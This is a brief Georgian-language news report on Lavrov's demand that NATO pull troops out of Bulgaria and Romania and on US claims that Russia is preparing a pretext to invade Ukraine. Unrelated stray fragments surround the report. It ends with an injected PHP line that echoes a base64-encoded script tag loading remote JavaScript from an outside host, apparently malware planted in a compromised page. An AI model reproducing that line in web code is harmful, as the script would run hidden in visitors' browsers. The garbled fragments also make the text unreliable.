celsiusi
ავერსი შნაიდერი
რუსეთის საგარეო საქმეთა მინისტრის, სერგეი ლავროვის თქმით, რუსეთის მიერ შეთავაზებული "უსაფრთხოების გარანტიები" NATO-ს ჯარების ბულგარეთიდან და რუმინეთიდან გასვლას ითვალისწინებს. 
 
მოსკოვი NATO-სგან ითხოვს გარანტიებს, რომ ბლოკი შეაჩერებს გაფართოებას და დაუბრუნდება 1997 წლის კონფიგურაციას. კითხვაზე თუ რას გულისხმობს ეს მოთხოვნა იმ ქვეყნებისთვის, რომლებიც ჩრდილოატლანტიკური ალიანს 1997 წლის შემდეგ შეურთდნენ, სერგეი ლავროვმა უპასუხა, რომ რუსეთს სურს NATO-მ ამ ქვეყნებიდან ყველა უცხოური ჯარი, იარაღი და სხვა სამხედრო ტექნიკა გაიყვანოს.
 
რუსეთის საგარეო საქმეთა მინისტრი, სერგეი ლავროვი აშშ-ს სახელმწიფო მდივანს ხვდება.
 
უკრაინასა და რუსეთს შორის დაძაბული მდგომარეობის ფონზე გავრცელდა ინფორმაცია, რომ რუსეთი შეჭრის წინაპირობის შესაქმნელად აღმოსავლეთ უკრაინაში ოპერაციას ამზადებს. CNN-ის ცნობით, მათი წყაროს თქმით, ბაიდენის ადმინისტრაციაში სჯერათ, რომ რუსეთი, შესაძლოა, უკრაინაში შეჭრისთვის ემზადებოდეს, "რაც გამოიწვევს ადამიანების უფლებების ფართოდ დარღვევასა და ომის დანაშაულს, თუ დიპლომატია საკუთარ მიზანს ვერ შეასრულებს".
1011
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");